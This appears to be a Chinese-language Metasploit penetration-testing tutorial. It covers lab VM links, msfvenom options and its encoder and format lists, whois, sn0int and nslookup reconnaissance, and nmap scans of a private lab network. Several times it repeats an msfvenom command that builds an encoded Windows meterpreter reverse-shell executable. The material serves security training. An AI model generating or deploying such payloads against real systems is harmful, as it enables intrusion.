基于Metasploit的软件渗透测试
Windows 2000 Professional
链接:https://pan.baidu.com/s/13OSz_7H1mIpMKJMq92nEqg?pwd=upsm
提取码:upsm
Windows Server 2003 Standard x64 Edition
链接:https://pan.baidu.com/s/1Ro-BoTmp-1kq0W_lB9Oiww?pwd=ngsb
提取码:ngsb
Windows 7 x64
链接:https://pan.baidu.com/s/1-vLtP58-GXmkau0OLNoGcg?pwd=zp3o
提取码:zp3o
Debian 6(Kali Linux)
链接:https://pan.baidu.com/s/1Uw6SXS8z_IxdkNpLr9y0zQ?pwd=s2i5
提取码:s2i5
安装了Apatche、Tomcat、MySQL、 vsftpd并且配套Web安全测试练习教案
cd /usr/local/apache-tomcat-8.5.81/bin
./startup.sh
service mysql start打开浏览器输入127.0.0.1:8080/sec/
Metasploitable2-Linux (with vsftpd 2.3.4)
链接:https://pan.baidu.com/s/1a71zOXGi_9aLrXyEnvkHwQ?pwd=17g6
提取码:17g6
解压后直接为vmx文件,直接可用
基本概念
通讯协议
ARP
ICMP
TCP
专业术语
渗透攻击(Exploit)
测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的有内存溢出,网站程序漏洞利用,配置错误exploit。
攻击载荷(Payload)
我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立个反向连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是能在目标机器上执行有限命令的程序。
Shellcode
是进行攻击时的一系列被当作payload 的指令,通常在目标机器上执行之后提供一个可执行命令的shell
模块(Module)
MSF 的模块,由一系列代码组成。
监听器(Listener)
等待来自被攻击机器的incoming 连接的监听在测试者机器上的程序。
编码器(encoders)
msfencode –l 查看可用的编码器(encoders),效果最佳的是x86/shikata_ga_nai
Metasploit用户接口
MSF终端
#msfconsole
msf6>help connectMSF命令行
#msfconsole -x script; set rhost [ip]; set lhost [ip]; set PAYLOAD “…”;run
#msfconsole -r path/xxx.rcArmitage
安装
下载Armitage:https://gitlab.com/kalilinux/packages/armitage
解压armitage
#cd armitage#./package.sh# cd release#lldrwxr-xr-x 2 root root 4096 6月 29 18:40 unixdrwxr-xr-x 2 root root 4096 6月 29 18:40 windows#cd /etc/postgresql/14/main/#gedit pg_hba.conf |
|---|
注释掉所有
# "local" is for Unix domain socket connections onlylocal all all trust# IPv4 local connections:host all all 127.0.0.1/32 trust# IPv6 local connections:host all all ::1/128 trust | |
|---|---|
# service postgresql stop# msfdb reinit#service postgresql start#cd /home/jerry/下载/armitage-kali-master/release/unix# ./armitage | |
产生被控端与主控端
扫描
Metasploit功能程序
MSF攻击荷载生成器
编写语言 | 输出语言 |
|---|---|
Python | C |
Web 语言 | JavaScript |
# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options]
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=-f exe -o payload.exeOptions:
参数 | 内容 | 解析 | |
|---|---|---|---|
-l | --list | 列出[类型]的所有模块。类型包括:有效载荷、编码器、NOP、平台、ARCH、加密、格式、所有 | |
-p | --payload | 要使用的有效负载(-list payloads to list,--list options for arguments)。为自定义指定“-”或STDIN | |
--list-options | 列表--有效载荷的标准、高级和规避选项 | ||
-f | --format | 输出格式(使用--要列出的列表格式) | |
-e | --encoder | 要使用的编码器(使用--列出要列出的编码器) | |
--service-name | 生成服务二进制文件时要使用的服务名称 | ||
--sec-name | 生成大型Windows二进制文件时要使用的新节名称。默认值:随机4字符alpha字符串 | ||
--smallest | 使用所有可用编码器生成尽可能最小的有效负载 | ||
--encrypt | 要应用于外壳代码的加密或编码类型(使用--list encrypt to list) | ||
--encrypt-key | 用于加密的密钥 | ||
--encrypt-iv | 用于–encrypt的初始化向量 | ||
-a | --arch | 用于--有效负载和--编码器的体系结构(使用--列出要列出的ARCH) | |
--platform | 用于--有效负载的平台(使用--列出要列出的平台) | ||
-o | --out | 将有效负载保存到文件 | |
-b | --bad-chars | 要避免的字符示例:“\\x00\\xff” | |
-n | --nopsled | 将[长度]大小的NOSLED预先添加到有效负载上 | |
--pad-nops | 使用-n指定的nopled size作为总有效负载大小,自动在nopled前面加上数量(nops减去有效负载长度) | ||
-s | --space | 产生的有效负载的最大大小 | |
--encoder-space | 编码有效负载的最大大小(默认为-s值) | ||
-i | --iterations | 对有效负载进行编码的次数 | |
-c | --add-code | 指定要包含的其他win32外壳代码文件 | |
-x | --template | 指定要用作模板的自定义可执行文件 | |
-k | --keep | 保留--template行为并将负载作为新线程注入 | |
-v | --var-name | 指定用于特定输出格式的自定义变量名称 | |
-t | --timeout | 从STDIN读取有效负载时等待的秒数(默认值为30,0表示禁用) | |
-h | --help | 显示此消息 | |
MSF编码器
# msfvenom -l encoders
Framework Encoders [--encoder]Name | Rank | Description |
|---|---|---|
cmd/brace | low | Bash Brace Expansion Command Encoder |
cmd/echo | good | Echo Command Encoder |
cmd/generic_sh | manual | Generic Shell Variable Substitution Command Encoder |
cmd/ifs | low | Bourne ${IFS} Substitution Command Encoder |
cmd/perl | normal | Perl Command Encoder |
cmd/powershell_base64 | excellent | Powershell Base64 Command Encoder |
cmd/printf_php_mq | manual | printf(1) via PHP magic_quotes Utility Command Encoder |
generic/eicar | manual | The EICAR Encoder |
generic/none | normal | The "none" Encoder |
mipsbe/byte_xori | normal | Byte XORi Encoder |
mipsbe/longxor | normal | XOR Encoder |
mipsle/byte_xori | normal | Byte XORi Encoder |
mipsle/longxor | normal | XOR Encoder |
php/base64 | great | PHP Base64 Encoder |
ppc/longxor | normal | PPC LongXOR Encoder |
ppc/longxor_tag | normal | PPC LongXOR Encoder |
ruby/base64 | great | Ruby Base64 Encoder |
sparc/longxor_tag | normal | SPARC DWORD XOR Encoder |
x64/xor | normal | XOR Encoder |
x64/xor_context | normal | Hostname-based Context Keyed Payload Encoder |
x64/xor_dynamic | normal | Dynamic key XOR Encoder |
x64/zutto_dekiru | manual | Zutto Dekiru |
x86/add_sub | manual | Add/Sub Encoder |
x86/alpha_mixed | low | Alpha2 Alphanumeric Mixedcase Encoder |
x86/alpha_upper | low | Alpha2 Alphanumeric Uppercase Encoder |
x86/avoid_underscore_tolower | manual | Avoid underscore/tolower |
x86/avoid_utf8_tolower | manual | Avoid UTF8/tolower |
x86/bloxor | manual | BloXor - A Metamorphic Block Based XOR Encoder |
x86/bmp_polyglot | manual | BMP Polyglot |
x86/call4_dword_xor | normal | Call+4 Dword XOR Encoder |
x86/context_cpuid | manual | CPUID-based Context Keyed Payload Encoder |
x86/context_stat | manual | stat(2)-based Context Keyed Payload Encoder |
x86/context_time | manual | time(2)-based Context Keyed Payload Encoder |
x86/countdown | normal | Single-byte XOR Countdown Encoder |
x86/fnstenv_mov | normal | Variable-length Fnstenv/mov Dword XOR Encoder |
x86/jmp_call_additive | normal | Jump/Call XOR Additive Feedback Encoder |
x86/nonalpha | low | Non-Alpha Encoder |
x86/nonupper | low | Non-Upper Encoder |
x86/opt_sub | manual | Sub Encoder (optimised) |
x86/service | manual | Register Service |
x86/shikata_ga_nai | excellent | Polymorphic XOR Additive Feedback Encoder |
x86/single_static_bit | manual | Single Static Bit |
x86/unicode_mixed | manual | Alpha2 Alphanumeric Unicode Mixedcase Encoder |
x86/unicode_upper | manual | Alpha2 Alphanumeric Unicode Uppercase Encoder |
x86/xor_dynamic | normal | Dynamic key XOR Encoder |
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exeMSF攻击载荷
# msfvenom -l payloads
MSF NOP
# msfvenom -l nops
Framework NOPs (11 total)
========================= Name Description
---- -----------
aarch64/simple Simple NOP generator
armle/simple Simple NOP generator
cmd/generic Generates harmless padding for command payloads.
mipsbe/better Better NOP generator
php/generic Generates harmless padding for PHP scripts
ppc/simple Simple NOP generator
sparc/random SPARC NOP generator
tty/generic Generates harmless padding for TTY input
x64/simple An x64 single/multi byte NOP instruction generator.
x86/opty2 Opty2 multi-byte NOP generator
x86/single_byte Single-byte NOP generator MSF平台MSF平台
# msfvenom -l platforms
Framework Platforms [--platform]
========================================
Name
----
aix
android
apple_ios
arista
brocade
bsd
bsdi
cisco
firefox
freebsd
hardware
hpux
irix
java
javascript
juniper
linux
mainframe
mikrotik
multi
netbsd
netware
nodejs
openbsd
osx
php
python
r
ruby
solaris
unifi
unix
unknownWindows
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exeMSF有效负载和--编码器的体系结构
# msfvenom -l archs
Framework Architectures [--arch]
========================================
Name
----
aarch64
armbe
armle
cbea
cbea64
cmd
dalvik
firefox
java
mips
mips64
mips64le
mipsbe
mipsle
nodejs
php
ppc
ppc64
ppc64le
ppce500v2
python
r
ruby
sparc
sparc64
tty
x64
x86
x86_64
zarchmsfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exeMSF应用于外壳代码的加密或编码类型
# msfvenom -l encrypt
Framework Encryption Formats [--encrypt]
================================================
Name
----
aes256
base64
rc4
xorMSF文件格式
# msfvenom -l formats
msfvenom -l formats
Framework Executable Formats [--format]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
python-reflection
vba
vba-exe
vba-psh
vbs
war
Framework Transform Formats [--format]
==============================================
Name
----
base32
base64
bash
c
csharp
dw
dword
hex
java
js_be
js_le
num
perl
pl
powershell
ps1
py
python
raw
rb
ruby
sh
vbapplication
vbscript msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe查看配置
# msfvenom -p moduleName --list-options比如:
msfvenom -p windows/shell_reverse_tcp --list-options
Nasm shell
Netwide Assembler (简称 NASM)是一款基于x86架构的汇编与反汇编软件。它可以用来编写16位(8086、80286等)、32位(IA-32)和64位(x86_64)的程序。NASM被认为是Linux平台上最受欢迎的汇编工具之一。
NASM 最初是在朱利安·霍尔(Julian Hall)的协助下由西蒙·泰瑟姆(Simon Tatham)开发的。截至2016年,它被一个由Hans Peter Anvin领导的小团队所维护。 它是一款基于简化版BSD许可证(2-clause BSD License)的开放源代码软件。
cd /usr/share/metasploit-framework/tools/exploit
# ./nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp
nasm >Metasploit Express & Metasploit Pro
信息收集
被动信息搜索
Whois
格式
msf > whois example.com
msf> whois 192.168.1.100例子
msf6 > whois 3testing.com
[*] exec: whois 3testing.com
Domain Name: 3TESTING.COM
Registry Domain ID: 513017975_DOMAIN_COM-VRSN
Registrar WHOIS Server: grs-whois.hichina.com
Registrar URL: http://www.net.cn
Updated Date: 2017-06-27T15:41:17Z
Creation Date: 2006-07-09T13:24:36Z
Registry Expiry Date: 2023-07-09T13:24:36Z
Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.
Registrar IANA ID: 420
Registrar Abuse Contact Email: DomainAbuse@service.aliyun.com
Registrar Abuse Contact Phone: +86.95187
Domain Status: ok https://icann.org/epp#ok
Name Server: DNS10.HICHINA.COM
Name Server: DNS9.HICHINA.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2022-06-20T04:09:37Z <<<msf6 > whois 123.56.135.186
[*] exec: whois 123.56.135.186
% [whois.apnic.net]
% Whois data copyright termshttp://www.apnic.net/db/dbcopyright.html
% Information related to '123.56.0.0 - 123.57.255.255'
% Abuse contact for '123.56.0.0 - 123.57.255.255' is 'ipas@cnnic.cn'
inetnum:123.56.0.0 - 123.57.255.255
netname:ALISOFT
descr: Aliyun Computing Co., LTD
descr: 5F, Builing D, the West Lake International Plaza of S&T
descr: No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099
country:CN
admin-c:ZM1015-AP
tech-c: ZM877-AP
tech-c: ZM876-AP
tech-c: ZM875-AP
abuse-c:AC1601-AP
status: ALLOCATED PORTABLE
mnt-by: MAINT-CNNIC-AP
mnt-irt:IRT-CNNIC-CN
last-modified: 2021-06-16T01:25:33Z
source: APNIC
irt:IRT-CNNIC-CN
address:Beijing, China
e-mail: ipas@cnnic.cn
abuse-mailbox: ipas@cnnic.cn
admin-c:IP50-AP
tech-c: IP50-AP
auth: # Filtered
remarks:Please note that CNNIC is not an ISP and is not
remarks:empowered to investigate complaints of network abuse.
remarks:Please contact the tech-c or admin-c of the network.
mnt-by: MAINT-CNNIC-AP
last-modified: 2021-06-16T01:39:57Z
source: APNIC
role: ABUSE CNNICCN
address:Beijing, China
country:ZZ
phone: +000000000
e-mail: ipas@cnnic.cn
admin-c:IP50-AP
tech-c: IP50-AP
nic-hdl:AC1601-AP
remarks:Generated from irt object IRT-CNNIC-CN
abuse-mailbox: ipas@cnnic.cn
mnt-by: APNIC-ABUSE
last-modified: 2020-05-14T11:19:01Z
source: APNIC
person: Li Jia
address:NO.969 West Wen Yi Road, Yu Hang District, Hangzhou
country:CN
phone: +86-0571-85022088
e-mail: jiali.jl@alibaba-inc.com
nic-hdl:ZM1015-AP
mnt-by: MAINT-CNNIC-AP
last-modified: 2014-07-30T02:02:01Z
source: APNIC
person: Guoxin Gao
address:5F, Builing D, the West Lake International Plaza of S&T
address:No.391 Wen'er Road, Hangzhou City
address:Zhejiang, China, 310099
country:CN
phone: +86-0571-85022600
fax-no: +86-0571-85022600
e-mail: anti-spam@list.alibaba-inc.com
nic-hdl:ZM875-AP
mnt-by: MAINT-CNNIC-AP
last-modified: 2014-07-30T01:56:01Z
source: APNIC
person: security trouble
e-mail: yitian.gaoyt@alibaba-inc.com
address:5th,floor,Building D,the West Lake International Plaza of S&T,391#Wen??r Road
address:Hangzhou, Zhejiang, China
phone: +86-0571-85022600
country:CN
mnt-by: MAINT-CNNIC-AP
nic-hdl:ZM876-AP
last-modified: 2021-04-13T23:22:33Z
source: APNIC
person: Guowei Pan
address:5F, Builing D, the West Lake International Plaza of S&T
address:No.391 Wen'er Road, Hangzhou City
address:Zhejiang, China, 310099
country:CN
phone: +86-0571-85022088-30763
fax-no: +86-0571-85022600
e-mail: guowei.pangw@alibaba-inc.com
nic-hdl:ZM877-AP
mnt-by: MAINT-CNNIC-AP
last-modified: 2013-07-09T01:34:02Z
source: APNIC
% Information related to '123.56.128.0/19AS4837'
route: 123.56.128.0/19
descr: CNC Group CHINA169 Fujian Province Network
descr: Addresses from APNIC(YJZXNET)
country:CN
origin: AS4837
mnt-by: MAINT-CNCGROUP-RR
last-modified: 2008-09-04T07:55:26Z
source: APNIC
% This query was served by the APNIC Whois Service version 1.88.16 (WHOIS-AU3)netcraft
https://www.netcraft.com/
https://searchdns.netcraft.com/
Maltego
sn0int
安装
# apt install debian-keyring
# gpg -a --export --keyring /usr/share/keyrings/debian-maintainers.gpg git@rxv.cc | apt-key add -
# apt-key adv --keyserver keyserver.ubunt.com --refresh-keys dit@rxv.cc
# echo deb http://apt.vulns.sexy stable main>/etc/apt/sources.list.d/apt-vulns-key.list
# apt update
# apt install sn0int
#sn0int
[sn0int][default] > pkg quickstart使用
[sn0int][default] > workspace demo
[+] Connecting to database
[sn0int][demo] > add domain
[?] Domain: baidu.com
[sn0int][demo] > select domains
#1, "baidu.com"
[sn0int][demo] > use ctlogs
[sn0int][demo][kpcyrd/ctlogs] > run
[sn0int][demo] > use ctlogs
[sn0int][demo][kpcyrd/ctlogs] > run
[*] "baidu.com" : Adding subdomain "durobotdev.baidu.com"
[*] "baidu.com" : Adding subdomain "play-infoflow.baidu.com"
[*] "baidu.com" : Adding subdomain "www.play-infoflow.baidu.com"
[*] "baidu.com" : Adding subdomain "dlswbr.baidu.com"
[*] "baidu.com" : Adding subdomain "otapcdn.baidu.com"
[*] "baidu.com" : Adding subdomain "foundation.baidu.com"
[*] "baidu.com" : Adding subdomain "mdm-duguanjia.baidu.com"
[*] "baidu.com" : Adding subdomain "lookup.api.bsb.baidu.com"
[*] "baidu.com" : Adding subdomain "download.api.bsb.baidu.com"
[*] "baidu.com" : Adding subdomain "duke.baidu.com"
[*] "baidu.com" : Adding subdomain "ditan.huodong.baidu.com"
[*] "baidu.com" : Adding subdomain "httpsdns.baidu.com"
[*] "baidu.com" : Adding subdomain "vpn.baidu.com"
[*] "baidu.com" : Adding subdomain "otacdn.baidu.com"
[*] "baidu.com" : Adding subdomain "trafficsafe.baidu.com"ZoomEye
nslookup
msf6 > nslookup
set type=mx
example.com例子
msf6 > nslookup www.3testing.com
[*] exec: nslookup www.3testing.com
Server: 8.8.8.8
Address:8.8.8.8#53
Non-authoritative answer:
Name: www.3testing.com
Address: 123.56.135.186
msf6 > nslookup www.3testing.com
[*] exec: nslookup www.3testing.com
Server: 192.168.0.1
Address: 192.168.0.1#53
Non-authoritative answer:
Name: www.3testing.com
Address: 123.56.135.186Google Hacking
主动信息搜索
namp扫描
最基本的扫描
#nmap 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:09 CST
Nmap scan report for 192.168.0.106
Host is up (0.0028s latency).
Not shown: 978 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
79/tcp open finger
80/tcp open http
106/tcp open pop3pw
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
2869/tcp open icslap
3306/tcp open mysql
5555/tcp open freeciv
8000/tcp open http-alt
8009/tcp open ajp13
8080/tcp open http-proxy
8100/tcp open xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.58 seconds扫描活跃的主机 -sn
#nmap -sn 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:13 CST
Nmap scan report for 192.168.0.106
Host is up (0.00066s latency).
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds扫描多台机器
利用IP1IP2 … IPn
# nmap 192.168.0.106 192.168.0.150 192.168.0.158 192.168.0.160
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:27 CST
Nmap scan report for 192.168.0.106
Host is up (0.0017s latency).
Not shown: 978 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
79/tcp open finger
80/tcp open http
106/tcp open pop3pw
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
2869/tcp open icslap
3306/tcp open mysql
5555/tcp open freeciv
8000/tcp open http-alt
8009/tcp open ajp13
8080/tcp open http-proxy
8100/tcp open xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap scan report for 192.168.0.158
Host is up (0.0087s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Nmap scan report for 192.168.0.160
Host is up (0.0017s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Nmap scan report for 192.168.0.150
Host is up (0.0000040s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
Nmap done: 4 IP addresses (4 hosts up) scanned in 1.08 seconds利用IP1-IP2
# nmap 192.168.0.100-160
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:39 CST
Nmap scan report for 192.168.0.106
Host is up (0.00058s latency).
Not shown: 978 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
79/tcp open finger
80/tcp open http
106/tcp open pop3pw
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
2869/tcp open icslap
3306/tcp open mysql
5555/tcp open freeciv
8000/tcp open http-alt
8009/tcp open ajp13
8080/tcp open http-proxy
8100/tcp open xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap scan report for 192.168.0.151
Host is up (0.016s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
5357/tcp open wsdapi
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Nmap scan report for 192.168.0.158
Host is up (0.016s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Nmap scan report for 192.168.0.159
Host is up (0.012s latency).
All 1000 scanned ports on 192.168.0.159 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Nmap scan report for 192.168.0.150
Host is up (0.0000030s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
Nmap done: 61 IP addresses (5 hosts up) scanned in 4.12 seconds利用IP/24
#nmap192.169.0.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:34 CST
Nmap scan report for 192.168.0.1
Host is up (0.0086s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
1900/tcp open upnp
MAC Address: F4:83:CD:A6:DE:E3 (Tp-link Technologies)
Nmap scan report for 192.168.0.106
Host is up (0.0011s latency).
Not shown: 978 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
79/tcp open finger
80/tcp open http
106/tcp open pop3pw
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
2869/tcp open icslap
3306/tcp open mysql
5555/tcp open freeciv
8000/tcp open http-alt
8009/tcp open ajp13
8080/tcp open http-proxy
8100/tcp open xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap scan report for 192.168.0.151
Host is up (0.017s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
5357/tcp open wsdapi
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Nmap scan report for 192.168.0.158
Host is up (0.021s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Nmap scan report for 192.168.0.159
Host is up (0.013s latency).
All 1000 scanned ports on 192.168.0.159 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
MAC Address: 38:00:25:34:7E:7F (Intel Corporate)
Nmap scan report for 192.168.0.161
Host is up (0.00029s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Nmap scan report for 192.168.0.150
Host is up (0.0000040s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
Nmap done: 256 IP addresses (7 hosts up) scanned in 5.18 seconds使用ICMP对设备进行扫描
使用ICMP类似Ping的请求响应扫描 -PE
#nmap -PE 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:44 CST
Nmap scan report for 192.168.0.106
Host is up (0.00018s latency).
Not shown: 978 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
79/tcp open finger
80/tcp open http
106/tcp open pop3pw
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
2869/tcp open icslap
3306/tcp open mysql
5555/tcp open freeciv
8000/tcp open http-alt
8009/tcp open ajp13
8080/tcp open http-proxy
8100/tcp open xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds使用ICMP时间戳响应扫描 -PP
#nmap -PP 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:55 CST
Nmap scan report for 192.168.0.106
Host is up (0.0021s latency).
Not shown: 978 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
79/tcp open finger
80/tcp open http
106/tcp open pop3pw
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
2869/tcp open icslap
3306/tcp open mysql
5555/tcp open freeciv
8000/tcp open http-alt
8009/tcp open ajp13
8080/tcp open http-proxy
8100/tcp open xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds使用ICMP掩码扫描 -PM
#nmap -PM 192.168.0.106使用TCP对设备进行扫描
使用TCP SYN对设备进行扫描 - PS
#nmap -PS 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:02 CST
Nmap scan report for 192.168.0.106
Host is up (0.0022s latency).
Not shown: 978 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
79/tcp open finger
80/tcp open http
106/tcp open pop3pw
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
2869/tcp open icslap
3306/tcp open mysql
5555/tcp open freeciv
8000/tcp open http-alt
8009/tcp open ajp13
8080/tcp open http-proxy
8100/tcp open xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds使用TCP ACK对设备进行扫描 -PA
# nmap -PA 192.168.0.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:05 CST
Nmap scan report for 192.168.0.106
Host is up (0.00017s latency).
Not shown: 978 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
79/tcp open finger
80/tcp open http
106/tcp open pop3pw
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
2869/tcp open icslap
3306/tcp open mysql
5555/tcp open freeciv
8000/tcp open http-alt
8009/tcp open ajp13
8080/tcp open http-proxy
8100/tcp open xprint-server
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 1.42 seconds使用UDP对设备进行扫描 -PU
UDP扫描更简单,但是不如TCP方便,且慢。
#nmap -PU 192.168.0.106
tarting Nmap 7.92 ( https://nmap.org ) at 2022-06-14 18:36 CST
Nmap scan report for 192.168.0.106
Host is up (0.00076s latency).
MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds对端口进行扫描
